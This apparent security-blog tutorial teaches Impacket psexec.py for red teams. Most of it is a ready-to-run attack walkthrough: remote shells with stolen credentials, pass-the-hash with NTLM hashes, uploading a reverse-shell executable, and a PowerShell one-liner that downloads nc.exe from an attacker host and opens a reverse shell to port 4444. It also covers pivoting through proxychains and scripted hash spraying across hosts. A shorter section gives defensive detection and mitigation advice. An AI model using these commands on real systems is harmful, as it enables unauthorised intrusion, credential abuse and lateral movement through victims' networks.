Mastering Impacket PsExec: The Ultimate Guide to Remote Command Execution and Lateral Movement for Red Teams + Video

Listen to this Post

🐢▶️ Listen🚀

Introduction:

Impacket’s PsExec implementation (psexec.py) allows penetration testers to execute commands remotely over the SMB protocol, mimicking the legitimate Windows Sysinternals PsExec tool. By leveraging credentials or NTLM hashes, attackers can obtain interactive shells, upload payloads, and move laterally across a network, making it a core technique for internal post‑exploitation.

Learning Objectives:

• Execute remote commands and spawn interactive shells on Windows targets using psexec.py.
• Perform Pass‑the‑Hash (PtH) attacks to authenticate without knowing the plaintext password.
• Upload malicious payloads and move laterally across multiple hosts in a domain environment.

You Should Know:

1. Installing Impacket and Dependencies

Impacket is a Python library for network protocols; psexec.py is one of its many tools. Follow this step‑by‑step guide to set it up on a Linux attack machine (Kali or any Debian‑based distro).

Step‑by‑step installation:

• Update your package list: `sudo apt update`
  – Install Python3 and pip if missing: `sudo apt install python3 python3-pip -y`
  – Install Impacket directly from GitHub (latest version):

  git clone https://github.com/SecureAuthCorp/impacket.git
  cd impacket
  sudo python3 setup.py install
  

• Alternatively, install via pip: `sudo pip3 install impacket`
  – Verify installation: `psexec.py -h` (should display help menu)

Windows alternative: Impacket can be run from Windows using Python or WSL, but Linux is preferred for penetration testing.

2. Basic Remote Command Execution with psexec.py

psexec.py connects to the ADMIN$ share (C:\Windows) and uploads a service executable to run your commands. Use it when you have valid credentials (username/password) for a target.

Syntax: `psexec.py domain/username:password@target_ip command`

Step‑by‑step guide:

• Identify a reachable Windows target (e.g., 192.168.1.10) with SMB port 445 open.
• Run a single command remotely:

  psexec.py administrator:[email protected] "whoami"
  

• Get an interactive shell (leave command blank or use cmd.exe):

  psexec.py administrator:[email protected]
  

• Use the `-target-ip` flag if hostname resolution fails:

  psexec.py admin:[email protected] -target-ip 192.168.1.10
  

• For domain users: `psexec.py DOMAIN/user:[email protected]`

  Expected output: The command output returns to your terminal, and an interactive shell shows C:\Windows\system32>.

3. Pass‑the‑Hash (PtH) with NTLM Hashes

When you have only the NTLM hash (extracted from LSASS, SAM, or NTDS.dit), psexec.py supports PtH without the plaintext password. This is a game‑changer for lateral movement.

Step‑by‑step guide:

• Obtain an NTLM hash (e.g., `aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0` for a blank password).
• Use the hash in place of the password with `-hashes` flag (LM:NT format):

  psexec.py [email protected] -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
  

• For a real hash (e.g., NTLM hash 570a9a65db17f4c6c1e3d53c26a3c9e8):

  psexec.py DOMAIN/[email protected] -hashes :570a9a65db17f4c6c1e3d53c26a3c9e8
  

• Combine with `-no-pass` if you only have the hash.
• Verify access by running `whoami` inside the shell.

Troubleshooting: If the target has SMB signing enabled, PtH may fail. Check with nmap --script smb-security-mode -p445 192.168.1.10.

4. Uploading and Executing Payloads

Once you have a shell, you can upload custom tools (reverse shells, Mimikatz, etc.) and execute them. psexec.py itself does not have a built‑in upload command, but you can combine it with Impacket’s `smbclient.py` or use a simple PowerShell download cradle.

Step‑by‑step guide using smbclient.py:

• Open a separate terminal and connect to the target’s ADMIN$ share:

  smbclient.py administrator:[email protected] -target-ip 192.168.1.10
  

• Inside smbclient, upload a payload:

  put /home/attacker/reverse_shell.exe rev.exe
  

• From your psexec.py shell, execute the uploaded payload:

  C:\Windows\system32> C:\rev.exe
  

Alternative PowerShell method (no extra tools):

• In the psexec shell, run a one‑liner to download and execute:

  powershell -c "Invoke-WebRequest -Uri http://attacker_ip/nc.exe -OutFile C:\nc.exe; C:\nc.exe attacker_ip 4444 -e cmd.exe"
  

5. Lateral Movement Across the Network

After compromising one host, use psexec.py to pivot to other machines. This requires that the same credentials or hashes work on multiple hosts (common with local admin accounts or domain admins).

Step‑by‑step guide:

• On the first compromised host, run `net view` to discover other machines or query DNS for internal servers.
• Use psexec.py directly from your attack machine to the next target:

  psexec.py DOMAIN/[email protected] -hashes :570a9a65db17f4c6c1e3d53c26a3c9e8
  

• For stealth, proxy your traffic through the compromised host using proxychains:
• Configure `/etc/proxychains4.conf` with `socks5 127.0.0.1 1080`
  – On the compromised host, start a SOCKS tunnel via SSH or chisel.
• Run psexec.py through proxychains: `proxychains psexec.py user@internal_target …`
  – Automate lateral movement with a script that iterates over a list of IPs and tries the same hash.

Real‑world scenario: From a workstation, move to a file server, then to a domain controller – all with the same NTLM hash extracted from LSASS.

6. Detecting and Mitigating PsExec Attacks (For Defenders)

Understanding the attack allows blue teams to harden their environment. Here are key mitigations and detection methods.

Detection:

• Monitor Event ID 7045 (service installation) – psexec.py creates a temporary service (e.g., PSEXESVC).
• Look for Event ID 4624 (logon type 3 – network logon) followed by 4672 (special privileges assigned).
• Track network connections from unusual processes to port 445 (SMB) from non‑domain workstations.
• Use Sysmon event ID 1 (process creation) for `cmd.exe` or `powershell.exe` spawned by services.

Mitigation commands (Windows):

• Disable the ADMIN$ share if not needed (not recommended for production):

  net share ADMIN$ /delete
  

• Enforce SMB signing on all Windows machines:

  Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanWorkstation\Parameters" -Name "RequireSecuritySignature" -Value 1
  

• Restrict local administrator privileges via LAPS (Local Administrator Password Solution).
• Enable Windows Defender Firewall to block inbound SMB from untrusted subnets.

7. Advanced: Impacket PsExec with Proxychains for Pivoting

When you have limited direct access (e.g., only one edge host is reachable), use proxychains to route psexec traffic through a compromised pivot.

Step‑by‑step guide:

• Compromise a Linux pivot host (or Windows with SSH) inside the target network.
• On your attack machine, set up a dynamic SOCKS tunnel using SSH:

  ssh -D 1080 user@pivot_host
  

• Edit `/etc/proxychains4.conf` to ensure `socks5 127.0.0.1 1080` is uncommented and `proxy_dns` is enabled.
• Run psexec.py through proxychains:

  proxychains psexec.py DOMAIN/[email protected] -hashes :NTLMhash
  

• The traffic will tunnel through the pivot, allowing you to reach internal hosts not directly accessible.

For Windows pivots: Use `chisel` to create a SOCKS proxy, then point proxychains to the chisel client’s port.

What Undercode Say:

• Key Takeaway 1: Impacket’s psexec.py is a Swiss Army knife for SMB‑based remote execution – combining it with Pass‑the‑Hash and lateral movement techniques gives red teams reliable post‑exploitation capabilities even without plaintext passwords.
• Key Takeaway 2: Defenders must prioritize SMB signing, privileged access management, and service installation monitoring; a single compromised local admin hash can lead to full domain takeover if lateral movement is unchecked.

Analysis: The beauty of psexec.py lies in its simplicity – one command transforms a hash into an interactive shell. However, its reliance on service creation (Event ID 7045) is a clear detection signature. Modern EDRs often flag this behavior, but many internal networks still lack proper SMB hardening. Attackers increasingly combine psexec.py with tools like `ntlmrelayx` or `secretsdump` to extend the attack chain. For blue teams, implementing LAPS and blocking NTLM authentication where possible drastically reduces the impact of PtH. As cloud and hybrid environments grow, SMB lateral movement remains a persistent threat – legacy protocols die hard.

Prediction:

As Microsoft pushes cloud‑native authentication (Azure AD, Windows Hello) and deprecates NTLM, traditional PtH attacks will lose effectiveness over the next 2–3 years. However, legacy on‑premise systems will persist in critical infrastructure, keeping Impacket PsExec relevant for red teams. Attackers will shift toward abusing SMB over QUIC (SMB over HTTP/3) or encrypted RPC channels, forcing tools like psexec.py to evolve. Simultaneously, defenders will adopt zero‑trust micro‑segmentation, making lateral movement via SMB far more challenging. The cat‑and‑mouse game will move from credential theft to misconfigured service accounts and token manipulation – but for now, psexec.py remains a pentester’s best friend.

▶️ Related Video (76% Match):

🎯Let’s Practice For Free:

IT/Security Reporter URL:

Reported By: Shubham Sharmaa – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky